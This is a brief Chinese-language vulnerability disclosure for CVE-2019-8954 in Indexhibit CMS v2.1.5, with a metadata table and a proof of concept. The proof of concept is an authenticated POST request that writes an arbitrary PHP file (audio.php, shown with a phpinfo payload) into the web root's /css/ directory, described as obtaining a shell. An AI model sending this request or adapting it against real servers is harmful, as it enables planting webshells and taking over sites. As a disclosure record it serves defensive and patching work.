| 漏洞名称 | 上报日期 | 漏洞发现者 | 产品首页 | 软件链接 | 版本 | CVE编号 |
|---|---|---|---|---|---|---|
| indexhibit cms v2.1.5 直接编辑php文件getshell | 2019-02-20 | yc([email protected]) | https://www.indexhibit.org/ | https://www.indexhibit.org/ | v2.1.5 | CVE-2019-8954 |
indexhibit CMS 2.1.5版本存在一个直接编辑php文件的漏洞,导致getshell。
当我们登录进后台后,向/ndxzstudio/?a=system
post数据:
upd_jxcode=true&v=%253C%253Fphp%2520phpinfo()%253B%253F%253E&id=%2Fcss%2Faudio.php
即可在/css/目录写入一个php文件audio.php。
成功getshell:
